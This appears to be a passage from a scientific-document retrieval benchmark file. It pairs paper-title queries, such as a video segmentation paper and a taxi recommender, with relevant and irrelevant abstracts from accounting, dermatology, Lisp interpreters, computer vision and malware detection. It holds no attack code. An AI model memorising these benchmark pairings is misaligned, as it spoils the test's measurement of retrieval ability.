strategy or business policy has become increasingly important since it emerged in the 1950s (see Chandler, 1962). Much of the empirical research in this area follows a contingency approach and involves a search for systematic relationships between specific elements of the MCS and the particular strategy of the organization (Simons, 1987a; Merchant, 1985b; Govindarajan 81 Gupta, 1985). Case studies have also been undertaken to investigate the role of the MCS in supporting and influencing the strategic processes within organizations (Simons, 1990; Roberts, 1990; Archer & Otley, 1991). The focus has been primarily on business strategy at the senior management level of the organization. However, since the mid198Os, in the operations management literature there has been a growing interest in researching the way that manufacturing strategies can be used to gain competitive advantage (Buffa, 1984; Schonberger, 1986; Hayes et al., 1988). Normative studies and single case studies have explored the relationship between MCS and *This paper has benefited from comments of seminar participants at Lancaster University, University of Adelaide and the University of Tasmania, and participants at the European Accounting Association meeting held in Finland in 1993. I am also grateful for the help provided by Anthony Hopwood and the anonymous referees.",
"title": ""
},
{
"docid": "07575ce75d921d6af72674e1fe563ff7",
"text": "With a growing body of literature linking systems of high-performance work practices to organizational performance outcomes, recent research has pushed for examinations of the underlying mechanisms that enable this connection. In this study, based on a large sample of Welsh public-sector employees, we explored the role of several individual-level attitudinal factors--job satisfaction, organizational commitment, and psychological empowerment--as well as organizational citizenship behaviors that have the potential to provide insights into how human resource systems influence the performance of organizational units. The results support a unit-level path model, such that department-level, high-performance work system utilization is associated with enhanced levels of job satisfaction, organizational commitment, and psychological empowerment. In turn, these attitudinal variables were found to be positively linked to enhanced organizational citizenship behaviors, which are further related to a second-order construct measuring departmental performance.",
"title": ""
},
{
"docid": "3b4622a4ad745fc0ffb3b6268eb969fa",
"text": "Eruptive syringomas: unresponsiveness to oral isotretinoin A 22-year-old man of Egyptian origin was referred to our department due to exacerbation of pruritic pre-existing papular dermatoses. The skin lesions had been present since childhood. The family history was negative for a similar condition. The patient complained of exacerbation of the pruritus during physical activity under a hot climate and had moderate to severe pruritus during his work. Physical examination revealed multiple reddish-brownish smooth-surfaced, symmetrically distributed papules 2–4 mm in diameter on the patient’s trunk, neck, axillae, and limbs (Fig. 1). The rest of the physical examination was unremarkable. The Darier sign was negative. A skin biopsy was obtained from a representative lesion on the trunk. Histopathologic examination revealed a small, wellcircumscribed neoplasm confined to the upper dermis, composed of small solid and ductal structures relatively evenly distributed in a sclerotic collagenous stroma. The solid elements were of various shapes (round, oval, curvilinear, “comma-like,” or “tadpole-like”) (Fig. 2). These microscopic features and the clinical presentation were consistent with the diagnosis of eruptive syringomas. Our patient was treated with a short course of oral antihistamines without any effect and subsequently with low-dose isotretinoin (10 mg/day) for 5 months. No improvement of the skin eruption was observed while cessation of the pruritus was accomplished. Syringoma is a common adnexal tumor with differentiation towards eccrine acrosyringium composed of small solid and ductal elements embedded in a sclerotic stroma and restricted as a rule to the upper to mid dermis, usually presenting clinically as multiple lesions on the lower eyelids and cheeks of adolescent females. A much less common variant is the eruptive or disseminated syringomas, which involve primarily young women. Eruptive syringomas are characterized by rapid development during a short period of time of hundreds of small (1–5 mm), ill-defined, smooth surfaced, skin-colored, pink, yellowish, or brownish papules typically involving the face, trunk, genitalia, pubic area, and extremities but can occur principally in any site where eccrine glands are found. The pathogenesis of eruptive syringoma remains unclear. Some authors have recently challenged the traditional notion that eruptive syringomas are neoplastic lesions. Chandler and Bosenberg presented evidence that eruptive syringomas result from autoimmune destruction of the acrosyringium and proposed the term autoimmune acrosyringitis with ductal cysts. Garrido-Ruiz et al. support the theory that eruptive syringomas may represent a hyperplastic response of the eccrine duct to an inflammatory reaction. In a recent systematic review by Williams and Shinkai the strongest association of syringomas was with Down’s syndrome (183 reported cases, 22.2%). Syringomas are also associated with diabetes mellitus (17 reported cases, 2.1%), Ehlers–Danlos",
"title": ""
},
{
"docid": "4172a0c101756ea8207b65b0dfbbe8ce",
"text": "Inspired by ACTORS [7, 17], we have implemented an interpreter for a LISP-like language, SCHEME, based on the lambda calculus [2], but extended for side effects, multiprocessing, and process synchronization. The purpose of this implementation is tutorial. We wish to: 1. alleviate the confusion caused by Micro-PLANNER, CONNIVER, etc., by clarifying the embedding of non-recursive control structures in a recursive host language like LISP. 2. explain how to use these control structures, independent of such issues as pattern matching and data base manipulation. 3. have a simple concrete experimental domain for certain issues of programming semantics and style. This paper is organized into sections. The first section is a short “reference manual” containing specifications for all the unusual features of SCHEME. Next, we present a sequence of programming examples which illustrate various programming styles, and how to use them. This will raise certain issues of semantics which we will try to clarify with lambda calculus in the third section. In the fourth section we will give a general discussion of the issues facing an implementor of an interpreter for a language based on lambda calculus. Finally, we will present a completely annotated interpreter for SCHEME, written in MacLISP [13], to acquaint programmers with the tricks of the trade of implementing non-recursive control structures in a recursive language like LISP. This report describes research done at the Artificial Intelligence Laboratory of the Massachusetts Institute of Technology. Support for the laboratory’s artificial intelligence research is provided in part by the Advanced Research Projects Agency of the Department of Defense under Office of Naval Research contract N00014-75-C0643. 1. The SCHEME Reference Manual SCHEME is essentially a full-funarg LISP. LAMBDAexpressions need not be QUOTEd, FUNCTIONed, or *FUNCTIONed when passed as arguments or returned as values; they will evaluate to closures of themselves. All LISP functions (i.e.,EXPRs,SUBRs, andLSUBRs, butnotFEXPRs,FSUBRs, orMACROs) are primitive operators in SCHEME, and have the same meaning as they have in LISP. Like LAMBDAexpressions, primitive operators and numbers are self-evaluating (they evaluate to trivial closures of themselves). There are a number of special primitives known as AINTs which are to SCHEME as FSUBRs are to LISP. We will enumerate them here. IF This is the primitive conditional operator. It takes three arguments. If the first evaluates to non-NIL , it evaluates the second expression, and otherwise the third. QUOTE As in LISP, this quotes the argument form so that it will be passed verbatim as data. The abbreviation “ ’FOO” may be used instead of “ (QUOTE FOO) ”. 406 SUSSMAN AND STEELE DEFINE This is analogous to the MacLISP DEFUNprimitive (but note that theLAMBDA must appear explicitly!). It is used for defining a function in the “global environment” permanently, as opposed to LABELS(see below), which is used for temporary definitions in a local environment.DEFINE takes a name and a lambda expression; it closes the lambda expression in the global environment and stores the closure in the LISP value cell of the name (which is a LISP atom). LABELS We have decided not to use the traditional LABEL primitive in this interpreter because it is difficult to define several mutually recursive functions using only LABEL. The solution, which Hewitt [17] also uses, is to adopt an ALGOLesque block syntax: (LABELS <function definition list> <expression>) This has the effect of evaluating the expression in an environment where all the functions are defined as specified by the definitions list. Furthermore, the functions are themselves closed in that environment, and not in the outer environment; this allows the functions to call themselvesand each otherecursively. For example, consider a function which counts all the atoms in a list structure recursively to all levels, but which doesn’t count the NIL s which terminate lists (but NIL s in theCARof some list count). In order to perform this we use two mutually recursive functions, one to count the car and one to count the cdr, as follows: (DEFINE COUNT (LAMBDA (L) (LABELS ((COUNTCAR (LAMBDA (L) (IF (ATOM L) 1 (+ (COUNTCAR (CAR L)) (COUNTCDR (CDR L)))))) (COUNTCDR (LAMBDA (L) (IF (ATOM L) (IF (NULL L) 0 1) (+ (COUNTCAR (CAR L)) (COUNTCDR (CDR L))))))) (COUNTCDR L)))) ;Note: COUNTCDR is defined here. ASET This is the side effect primitive. It is analogous to the LISP function SET. For example, to define a cell [17], we may useASETas follows: (DEFINE CONS-CELL (LAMBDA (CONTENTS) (LABELS ((THE-CELL (LAMBDA (MSG) (IF (EQ MSG ’CONTENTS?) CONTENTS (IF (EQ MSG ’CELL?) ’YES (IF (EQ (CAR MSG) ’<-) (BLOCK (ASET ’CONTENTS (CADR MSG)) THE-CELL) (ERROR ’|UNRECOGNIZED MESSAGE CELL| MSG ’WRNG-TYPE-ARG))))))) THE-CELL))) INTERPRETER FOR EXTENDED LAMBDA CALCULUS 407 Those of you who may complain about the lack of ASETQare invited to write(ASET’ foo bar) instead of(ASET ’foo bar) . EVALUATE This is similar to the LISP functionEVAL. It evaluates its argument, and then evaluates the resulting s-expression as SCHEME code. CATCH This is the “escape operator” which gives the user a handle on the control structure of the interpreter. The expression: (CATCH <identifier> <expression>) evaluates<expression> in an environment where <identifier> is bound to a continuation which is “just about to return from the CATCH”; that is, if the continuation is called as a function of one argument, then control proceeds as if the CATCHexpression had returned with the supplied (evaluated) argument as its value. For example, consider the following obscure definition of SQRT(Sussman’s favorite style/Steele’s least favorite): (DEFINE SQRT (LAMBDA (X EPSILON) ((LAMBDA (ANS LOOPTAG) (CATCH RETURNTAG (PROGN (ASET ’LOOPTAG (CATCH M M)) ;CREATE PROG TAG (IF (< (ABS (-$ (*$ ANS ANS) X)) EPSILON) (RETURNTAG ANS) ;RETURN NIL) ;JFCL (ASET ’ANS (//$ (+$ (//$ X ANS) ANS) 2.0)) (LOOPTAG LOOPTAG)))) ;GOTO 1.0 NIL))) Anyone who doesn’t understand how this manages to work probably should not attempt to useCATCH. As another example, we can define a THROWfunction, which may then be used with CATCHmuch as they are in LISP: (DEFINE THROW (LAMBDA (TAG RESULT) (TAG RESULT))) CREATE!PROCESS This is the process generator for multiprocessing. It takes one argument, an expression to be evaluated in the current environment as a separate parallel process. If the expression ever returns a value, the process automatically terminates. The value ofCREATE!PROCESSis a process id for the newly generated process. Note that the newly created process will not actually run until it is explicitly started. START!PROCESS This takes one argument, a process id, and starts up that process. It then runs. 408 SUSSMAN AND STEELE STOP!PROCESS This also takes a process id, but stops the process. The stopped process may be continued from where it was stopped by using START!PROCESSagain on it. The magic global variable**PROCESS** always contains the process id of the currently running process; thus a process can stop itself by doing (STOP!PROCESS **PROCESS**) . A stopped process is garbage collected if no live process has a pointer to its process id. EVALUATE!UNINTERRUPTIBLY This is the synchronization primitive. It evaluates an expression uninterruptibly; i.e., no other process may run until the expression has returned a value. Note that if a funarg is returned from the scope of an EVALUATE!UNINTERRUPTIBLY, then that funarg will be uninterruptible when it is applied; that is, the uninterruptibility property follows the rules of variable scoping. For example, consider the following function: (DEFINE SEMGEN (LAMBDA (SEMVAL) (LIST (LAMBDA () (EVALUATE!UNINTERRUPTIBLY (ASET’ SEMVAL (+ SEMVAL 1)))) (LABELS (P (LAMBDA () (EVALUATE!UNINTERRUPTIBLY (IF (PLUSP SEMVAL) (ASET’ SEMVAL (SEMVAL 1)) (P))))) P)))) This returns a pair of functions which are V and P operations on a newly created semaphore. The argument to SEMGENis the initial value for the semaphore. Note that P busy-waits by iterating if necessary; because EVALUATE!UNINTERRUPTIBLYuses variable-scoping rules, other processes have a chance to get in at the beginning of each iteration. This busy-wait can be made much more efficient by replacing the expression (P) in the definition ofP with ((LAMBDA (ME) (BLOCK (START!PROCESS (CREATE!PROCESS ’(START!PROCESS ME))) (STOP!PROCESS ME) (P))) **PROCESS**) Let’s see you figure this one out! Note that a STOP!PROCESSwithin anEVALUATE! UNINTERRUPTIBLYforces the process to be swapped out even if it is the current one, and so other processes get to run; but as soon as it gets swapped in again, others are locked out as before. Besides theAINTs, SCHEME has a class of primitives known as AMACRO s These are similar to MacLISPMACROs, in that they are expanded into equivalent code before being executed. Some AMACRO s supplied with the SCHEME interpreter: INTERPRETER FOR EXTENDED LAMBDA CALCULUS 409 COND This is like the MacLISPCONDstatement, except that singleton clauses (where the result of the predicate is the returned value) are not allowed. AND, OR These are also as in MacLISP. BLOCK This is like the MacLISPPROGN, but arranges to evaluate its last argument without an extra net control frame (explained later), so that the last argument may involved in an iteration. Note that in SCHEME, unlike MacLISP, the body of a LAMBDAexpression is not an implicit PROGN. DO This is like the MacLISP “new-style” DO; old-styleDOis not supported. AMAPCAR , AMAPLIST These are likeMAPCARandMAPLIST, but they expect a SCHEME lambda closure for the first argument. To use SCHEME, simply incant at DDT (on MIT-AI): 3",
"title": ""
}
] | scidocsrr |
595ce8deaac1b99be434b97d8861b6e2 | CDTS: Collaborative Detection, Tracking, and Segmentation for Online Multiple Object Segmentation in Videos | [
{
"docid": "4997de0d1663a8362fb47abcf9e34df9",
"text": "Our goal is to segment a video sequence into moving objects and the world scene. In recent work, spectral embedding of point trajectories based on 2D motion cues accumulated from their lifespans, has shown to outperform factorization and per frame segmentation methods for video segmentation. The scale and kinematic nature of the moving objects and the background scene determine how close or far apart trajectories are placed in the spectral embedding. Such density variations may confuse clustering algorithms, causing over-fragmentation of object interiors. Therefore, instead of clustering in the spectral embedding, we propose detecting discontinuities of embedding density between spatially neighboring trajectories. Detected discontinuities are strong indicators of object boundaries and thus valuable for video segmentation. We propose a novel embedding discretization process that recovers from over-fragmentations by merging clusters according to discontinuity evidence along inter-cluster boundaries. For segmenting articulated objects, we combine motion grouping cues with a center-surround saliency operation, resulting in “context-aware”, spatially coherent, saliency maps. Figure-ground segmentation obtained from saliency thresholding, provides object connectedness constraints that alter motion based trajectory affinities, by keeping articulated parts together and separating disconnected in time objects. Finally, we introduce Gabriel graphs as effective per frame superpixel maps for converting trajectory clustering to dense image segmentation. Gabriel edges bridge large contour gaps via geometric reasoning without over-segmenting coherent image regions. We present experimental results of our method that outperform the state-of-the-art in challenging motion segmentation datasets.",
"title": ""
},
{
"docid": "2e016f935e8795fe1e470ff945b63646",
"text": "We address the problem of segmenting multiple object instances in complex videos. Our method does not require manual pixel-level annotation for training, and relies instead on readily-available object detectors or visual object tracking only. Given object bounding boxes at input, we cast video segmentation as a weakly-supervised learning problem. Our proposed objective combines (a) a discriminative clustering term for background segmentation, (b) a spectral clustering one for grouping pixels of same object instances, and (c) linear constraints enabling instance-level segmentation. We propose a convex relaxation of this problem and solve it efficiently using the Frank-Wolfe algorithm. We report results and compare our method to several baselines on a new video dataset for multi-instance person segmentation.",
"title": ""
},
{
"docid": "a00065c171175b84cf299718d0b29dde",
"text": "Semantic object segmentation in video is an important step for large-scale multimedia analysis. In many cases, however, semantic objects are only tagged at video-level, making them difficult to be located and segmented. To address this problem, this paper proposes an approach to segment semantic objects in weakly labeled video via object detection. In our approach, a novel video segmentation-by-detection framework is proposed, which first incorporates object and region detectors pre-trained on still images to generate a set of detection and segmentation proposals. Based on the noisy proposals, several object tracks are then initialized by solving a joint binary optimization problem with min-cost flow. As such tracks actually provide rough configurations of semantic objects, we thus refine the object segmentation while preserving the spatiotemporal consistency by inferring the shape likelihoods of pixels from the statistical information of tracks. Experimental results on Youtube-Objects dataset and SegTrack v2 dataset demonstrate that our method outperforms state-of-the-arts and shows impressive results.",
"title": ""
},
{
"docid": "a4b123705dda7ae3ac7e9e88a50bd64a",
"text": "We present a novel approach to video segmentation using multiple object proposals. The problem is formulated as a minimization of a novel energy function defined over a fully connected graph of object proposals. Our model combines appearance with long-range point tracks, which is key to ensure robustness with respect to fast motion and occlusions over longer video sequences. As opposed to previous approaches based on object proposals, we do not seek the best per-frame object hypotheses to perform the segmentation. Instead, we combine multiple, potentially imperfect proposals to improve overall segmentation accuracy and ensure robustness to outliers. Overall, the basic algorithm consists of three steps. First, we generate a very large number of object proposals for each video frame using existing techniques. Next, we perform an SVM-based pruning step to retain only high quality proposals with sufficiently discriminative power. Finally, we determine the fore-and background classification by solving for the maximum a posteriori of a fully connected conditional random field, defined using our novel energy function. Experimental results on a well established dataset demonstrate that our method compares favorably to several recent state-of-the-art approaches.",
"title": ""
}
] | [
{
"docid": "663068bb3ff4d57e1609b2a337a34d7f",
"text": "Automated optic disk (OD) detection plays an important role in developing a computer aided system for eye diseases. In this paper, we propose an algorithm for the OD detection based on structured learning. A classifier model is trained based on structured learning. Then, we use the model to achieve the edge map of OD. Thresholding is performed on the edge map, thus a binary image of the OD is obtained. Finally, circle Hough transform is carried out to approximate the boundary of OD by a circle. The proposed algorithm has been evaluated on three public datasets and obtained promising results. The results (an area overlap and Dices coefficients of 0.8605 and 0.9181, respectively, an accuracy of 0.9777, and a true positive and false positive fraction of 0.9183 and 0.0102) show that the proposed method is very competitive with the state-of-the-art methods and is a reliable tool for the segmentation of OD.",
"title": ""
},
{
"docid": "f8209a4b6cb84b63b1f034ec274fe280",
"text": "A major challenge in topic classification (TC) is the high dimensionality of the feature space. Therefore, feature extraction (FE) plays a vital role in topic classification in particular and text mining in general. FE based on cosine similarity score is commonly used to reduce the dimensionality of datasets with tens or hundreds of thousands of features, which can be impossible to process further. In this study, TF-IDF term weighting is used to extract features. Selecting relevant features and determining how to encode them for a learning machine method have a vast impact on the learning machine methods ability to extract a good model. Two different weighting methods (TF-IDF and TF-IDF Global) were used and tested on the Reuters-21578 text categorization test collection. The obtained results emerged a good candidate for enhancing the performance of English topics FE. Simulation results the Reuters-21578 text categorization show the superiority of the proposed algorithm.",
"title": ""
},
{
"docid": "4ad76f2c22a6429b7111349a86746aa0",
"text": "A photovoltaic array (PVA) simulation model to be used in Matlab-Simulink GUI environment is developed and presented in this paper. The model is developed using basic circuit equations of the photovoltaic (PV) solar cells including the effects of solar irradiation and temperature changes. The new model was tested using a directly coupled dc load as well as ac load via an inverter. Test and validation studies with proper load matching circuits are simulated and results are presented here.",
"title": ""
},
{
"docid": "b5d7c6a4d9551bf9b47b4e3754fb5911",
"text": "Discovering significant types of relations from the web is challenging because of its open nature. Unsupervised algorithms are developed to extract relations from a corpus without knowing the relations in advance, but most of them rely on tagging arguments of predefined types. Recently, a new algorithm was proposed to jointly extract relations and their argument semantic classes, taking a set of relation instances extracted by an open IE algorithm as input. However, it cannot handle polysemy of relation phrases and fails to group many similar (“synonymous”) relation instances because of the sparseness of features. In this paper, we present a novel unsupervised algorithm that provides a more general treatment of the polysemy and synonymy problems. The algorithm incorporates various knowledge sources which we will show to be very effective for unsupervised extraction. Moreover, it explicitly disambiguates polysemous relation phrases and groups synonymous ones. While maintaining approximately the same precision, the algorithm achieves significant improvement on recall compared to the previous method. It is also very efficient. Experiments on a realworld dataset show that it can handle 14.7 million relation instances and extract a very large set of relations from the web.",
"title": ""
},
{
"docid": "6721ff54fde3ac49c2e0e26ae683d5a1",
"text": "APT (Advanced Persistent Threat) is a genuine risk to the Internet. With the help of APT malware, attackers can remotely control infected machine and steal the personal information. DNS is well known for malware to find command and control (C&C) servers. The proposed novel system placed at the network departure guide that points toward effectively and efficiently detect APT malware infections based on malicious DNS and traffic analysis. To detect suspicious APT malware C&C domains the system utilizes malicious DNS analysis method, and afterward analyse the traffic of the comparing suspicious IP utilizing anomaly-based and signature based detection innovation. There are separated features in view of big data to describe properties of malware-related DNS. This manufactured a reputation engine to compute a score for an IP address by utilizing these elements vector together.",
"title": ""
},
{
"docid": "fd4bd9edcaff84867b6e667401aa3124",
"text": "We give suggestions for the presentation of research results from frequentist, information-theoretic, and Bayesian analysis paradigms, followed by several general suggestions. The information-theoretic and Bayesian methods offer alternative approaches to data analysis and inference compared to traditionally used methods. Guidance is lacking on the presentation of results under these alternative procedures and on nontesting aspects of classical frequentist methods of statistical analysis. Null hypothesis testing has come under intense criticism. We recommend less reporting of the results of statistical tests of null hypotheses in cases where the null is surely false anyway, or where the null hypothesis is of little interest to science or management. JOURNAL OF WILDLIFE MANAGEMENT 65(3):373-378",
"title": ""
},
{
"docid": "6c9acb831bc8dc82198aef10761506be",
"text": "In the context of civil rights law, discrimination refers to unfair or unequal treatment of people based on membership to a category or a minority, without regard to individual merit. Rules extracted from databases by data mining techniques, such as classification or association rules, when used for decision tasks such as benefit or credit approval, can be discriminatory in the above sense. In this paper, the notion of discriminatory classification rules is introduced and studied. Providing a guarantee of non-discrimination is shown to be a non trivial task. A naive approach, like taking away all discriminatory attributes, is shown to be not enough when other background knowledge is available. Our approach leads to a precise formulation of the redlining problem along with a formal result relating discriminatory rules with apparently safe ones by means of background knowledge. An empirical assessment of the results on the German credit dataset is also provided.",
"title": ""
},
{
"docid": "fa91331ef31de20ae63cc6c8ab33f062",
"text": "Humans move their hands and bodies together to communicate and solve tasks. Capturing and replicating such coordinated activity is critical for virtual characters that behave realistically. Surprisingly, most methods treat the 3D modeling and tracking of bodies and hands separately. Here we formulate a model of hands and bodies interacting together and fit it to full-body 4D sequences. When scanning or capturing the full body in 3D, hands are small and often partially occluded, making their shape and pose hard to recover. To cope with low-resolution, occlusion, and noise, we develop a new model called MANO (hand Model with Articulated and Non-rigid defOrmations). MANO is learned from around 1000 high-resolution 3D scans of hands of 31 subjects in a wide variety of hand poses. The model is realistic, low-dimensional, captures non-rigid shape changes with pose, is compatible with standard graphics packages, and can fit any human hand. MANO provides a compact mapping from hand poses to pose blend shape corrections and a linear manifold of pose synergies. We attach MANO to a standard parameterized 3D body shape model (SMPL), resulting in a fully articulated body and hand model (SMPL+H). We illustrate SMPL+H by fitting complex, natural, activities of subjects captured with a 4D scanner. The fitting is fully automatic and results in full body models that move naturally with detailed hand motions and a realism not seen before in full body performance capture. The models and data are freely available for research purposes at http://mano.is.tue.mpg.de.",
"title": ""
},
{
"docid": "d31646394ff4e6aa66bbb3c61651592e",
"text": "The computer vision strategies used to recognize a fruit rely on four basic features which characterize the object: intensity, color, shape and texture. This paper proposes an efficient fusion of color and texture features for fruit recognition. The recognition is done by the minimum distance classifier based upon the statistical and co-occurrence features derived from the Wavelet transformed subbands. Experimental results on a database of about 2635 fruits from 15 different classes confirm the effectiveness of the proposed approach.",
"title": ""
},
{
"docid": "427d0d445985ac4eb31c7adbaf6f1e22",
"text": "In this work, we jointly address the problem of text detection and recognition in natural scene images based on convolutional recurrent neural networks. We propose a unified network that simultaneously localizes and recognizes text with a single forward pass, avoiding intermediate processes, such as image cropping, feature re-calculation, word separation, and character grouping. In contrast to existing approaches that consider text detection and recognition as two distinct tasks and tackle them one by one, the proposed framework settles these two tasks concurrently. The whole framework can be trained end-to-end, requiring only images, ground-truth bounding boxes and text labels. The convolutional features are calculated only once and shared by both detection and recognition, which saves processing time. Through multi-task training, the learned features become more informative and improves the overall performance. Our proposed method has achieved competitive performance on several benchmark datasets.",
"title": ""
},
{
"docid": "afb0ca2ca4c9ba6402bff498f23f4c55",
"text": "We consider the problem of assigning software processes (or tasks) to hardware processors in distributed robotics environments. We introduce the notion of a task variant, which supports the adaptation of software to specific hardware configurations. Task variants facilitate the trade-off of functional quality versus the requisite capacity and type of target execution processors. We formalise the problem of assigning task variants to processors as a mathematical model that incorporates typical constraints found in robotics applications; the model is a constrained form of a multi-objective, multi-dimensional, multiple-choice knapsack problem. We propose and evaluate three different solution methods to the problem: constraint programming, a constructive greedy heuristic and a local search metaheuristic. Furthermore, we demonstrate the use of task variants in a real instance of a distributed interactive multi-agent navigation system, showing that our best solution method (constraint programming) improves the system’s quality of service, as compared to the local search metaheuristic, the greedy heuristic and a randomised solution, by an average of 16%, 41% and 56% respectively.",
"title": ""
},
{
"docid": "91a3969506858fd7484d870505c6b800",
"text": "Automatic grasp planning for robotic hands is a difficult problem because of the huge number of possible hand configurations. However, humans simplify the problem by choosing an appropriate prehensile posture appropriate for the object and task to be performed. By modeling an object as a set of shape primitives, such as spheres, cylinders, cones and boxes, we can use a set of rules to generate a set of grasp starting positions and pregrasp shapes that can then be tested on the object model. Each grasp is tested and evaluated within our grasping simulator “GraspIt!”, and the best grasps are presented to the user. The simulator can also plan grasps in a complex environment involving obstacles and the reachability constraints of a robot arm.",
"title": ""
},
{
"docid": "c4d204b8ceda86e9d8e4ca56214f0ba3",
"text": "This article may be used for research, teaching and private study purposes. Any substantial or systematic reproduction, redistribution , reselling , loan or sub-licensing, systematic supply or distribution in any form to anyone is expressly forbidden. The publisher does not give any warranty express or implied or make any representation that the contents will be complete or accurate or up to date. The accuracy of any instructions, formulae and drug doses should be independently verified with primary sources. The publisher shall not be liable for any loss, actions, claims, proceedings, demand or costs or damages whatsoever or howsoever caused arising directly or indirectly in connection with or arising out of the use of this material.",
"title": ""
},
{
"docid": "11112e1738bd27f41a5b57f07b71292c",
"text": "Rotor-cage fault detection in inverter-fed induction machines is still difficult nowadays as the dynamics introduced by the control or load influence the fault-indicator signals commonly applied. In addition, detection is usually possible only when the machine is operated above a specific load level to generate a significant rotor-current magnitude. This paper proposes a new method of detecting rotor-bar defects at zero load and almost at standstill. The method uses the standard current sensors already present in modern industrial inverters and, hence, is noninvasive. It is thus well suited as a start-up test for drives. By applying an excitation with voltage pulses using the switching of the inverter and then measuring the resulting current slope, a new fault indicator is obtained. As a result, it is possible to clearly identify the fault-induced asymmetry in the machine's transient reactances. Although the transient-flux linkage cannot penetrate the rotor because of the cage, the faulty bar locally influences the zigzag flux, leading to a significant change in the transient reactances. Measurement results show the applicability and sensitivity of the proposed method.",
"title": ""
},
{
"docid": "27ffdb0d427d2e281ffe84e219e6ed72",
"text": "UNLABELLED\nHitherto, noncarious cervical lesions (NCCLs) of teeth have been generally ascribed to either toothbrush-dentifrice abrasion or acid \"erosion.\" The last two decades have provided a plethora of new studies concerning such lesions. The most significant studies are reviewed and integrated into a practical approach to the understanding and designation of these lesions. A paradigm shift is suggested regarding use of the term \"biocorrosion\" to supplant \"erosion\" as it continues to be misused in the United States and many other countries of the world. Biocorrosion embraces the chemical, biochemical, and electrochemical degradation of tooth substance caused by endogenous and exogenous acids, proteolytic agents, as well as the piezoelectric effects only on dentin. Abfraction, representing the microstructural loss of tooth substance in areas of stress concentration, should not be used to designate all NCCLs because these lesions are commonly multifactorial in origin. Appropriate designation of a particular NCCL depends upon the interplay of the specific combination of three major mechanisms: stress, friction, and biocorrosion, unique to that individual case. Modifying factors, such as saliva, tongue action, and tooth form, composition, microstructure, mobility, and positional prominence are elucidated.\n\n\nCLINICAL SIGNIFICANCE\nBy performing a comprehensive medical and dental history, using precise terms and concepts, and utilizing the Revised Schema of Pathodynamic Mechanisms, the dentist may successfully identify and treat the etiology of root surface lesions. Preventive measures may be instituted if the causative factors are detected and their modifying factors are considered.",
"title": ""
},
{
"docid": "5635f52c3e02fd9e9ea54c9ea1ff0329",
"text": "As a digital version of word-of-mouth, online review has become a major information source for consumers and has very important implications for a wide range of management activities. While some researchers focus their studies on the impact of online product review on sales, an important assumption remains unexamined, that is, can online product review reveal the true quality of the product? To test the validity of this key assumption, this paper first empirically tests the underlying distribution of online reviews with data from Amazon. The results show that 53% of the products have a bimodal and non-normal distribution. For these products, the average score does not necessarily reveal the product's true quality and may provide misleading recommendations. Then this paper derives an analytical model to explain when the mean can serve as a valid representation of a product's true quality, and discusses its implication on marketing practices.",
"title": ""
},
{
"docid": "2f4043e4be2c02a33790bbff094749d0",
"text": "Well-positioned and configured vegetation barriers (VBs) have been suggested as one of the green infrastructures that could improve near-road (local) air quality. This is because of their influence on the underlying mechanisms: dispersion and mass removal (by deposition). Some studies have investigated air quality improvement by near-road vegetation barrier using the dispersion-related method while few studies have done the same using the deposition-related method. However, decision making on vegetation barrier's configuration and placement for need-based maximum benefit requires a combined assessment with both methods which are not commonly found in a single study. In the present study, we employed a computational fluid dynamics model, ENVI-met, to evaluate the air quality benefit of near-road vegetation barrier using an integrated dispersion-deposition approach. A technique based on distance between source (road) and point of peak concentration before dwindling concentration downwind begins referred to as \"distance to maximum concentration (DMC)\" has been proposed to determine optimum position from source and thickness of vegetation barrier for improved dispersion and deposition-based benefit, respectively. Generally, a higher volume of vegetation barrier increases the overall mass removal while it weakens dispersion of pollutant within the same domain. Hence, the benefit of roadside vegetation barrier is need-based and can be expressed as either higher mass deposition or higher mass dispersion. Finally, recommendations on applications of our findings were presented.",
"title": ""
},
{
"docid": "82c3003dc62528f5efc13f0e6f5ea9f6",
"text": "Deep Learning (DL) algorithms have become ubiquitous in data analytics. As a result, major computing vendors — including NVIDIA, Intel, AMD and IBM — have architectural road-maps influenced by DL workloads. Furthermore, several vendors have recently advertised new computing products as accelerating DL workloads. Unfortunately, it is difficult for data scientists to quantify the potential of these different products. This paper provides a performance and power analysis of important DL workloads on two major parallel architectures: NVIDIA DGX-1 (eight Pascal P100 GPUs interconnected with NVLink) and Intel Knights Landing (KNL) CPUs interconnected with Intel Omni-Path. Our evaluation consists of a cross section of convolutional neural net workloads: CifarNet, CaffeNet, AlexNet and GoogleNet topologies using the Cifar10 and ImageNet datasets. The workloads are vendor optimized for each architecture. GPUs provide the highest overall raw performance. Our analysis indicates that although GPUs provide the highest overall performance, the gap can close for some convolutional networks; and KNL can be competitive when considering performance/watt. Furthermore, NVLink is critical to GPU scaling.",
"title": ""
},
{
"docid": "75a1dba24f2b98904423b5db7c3b9df7",
"text": "INTRODUCTION\nShort-wavelengths can have an acute impact on alertness, which is allegedly due to their action on intrinsically photosensitive retinal ganglion cells. Classical photoreceptors cannot, however, be excluded at this point in time as contributors to the alerting effect of light. The objective of this study was to compare the alerting effect at night of a white LED light source while wearing blue-blockers or not, in order to establish the contribution of short-wavelengths.\n\n\nMATERIALS AND METHODS\n20 participants stayed awake under dim light (< 5 lx) from 23:00 h to 04:00 h on two consecutive nights. On the second night, participants were randomly assigned to one light condition for 30 min starting at 3:00 h. Group A (5M/5F) was exposed to 500 μW/cm(2) of unfiltered LED light, while group B (4M/6F) was required to wear blue-blocking glasses, while exposed to 1500 μW/cm(2) from the same light device in order to achieve 500 μW/cm(2) at eye level (as measured behind the glasses). Subjective alertness, energy, mood and anxiety were assessed for both nights at 23:30 h, 01:30 h and 03:30 h using a visual analog scale (VAS). Subjective sleepiness was assessed with the Stanford Sleepiness Scale (SSS). Subjects also performed the Conners' Continuous Performance Test II (CPT-II) in order to assess objective alertness. Mixed model analysis was used to compare VAS, SSS and CPT-II parameters.\n\n\nRESULTS\nNo difference between group A and group B was observed for subjective alertness, energy, mood, anxiety and sleepiness, as well as CPT-II parameters. Subjective alertness (p < 0.001), energy (p < 0.001) and sleepiness (p < 0.05) were, however improved after light exposure on the second night independently of the light condition.\n\n\nCONCLUSIONS\nThe current study shows that when sleepiness is high, the alerting effect of light can still be triggered at night in the absence of short-wavelengths with a 30 minute light pulse of 500 μW/cm(2). This suggests that the underlying mechanism by which a brief polychromatic light exposure improves alertness is not solely due to short-wavelengths through intrinsically photosensitive retinal ganglion cells.",
"title": ""
}
] | scidocsrr |
e8902b4f01103e4860c272c284704ce5 | T-Finder: A Recommender System for Finding Passengers and Vacant Taxis | [
{
"docid": "ebea79abc60a5d55d0397d21f54cc85e",
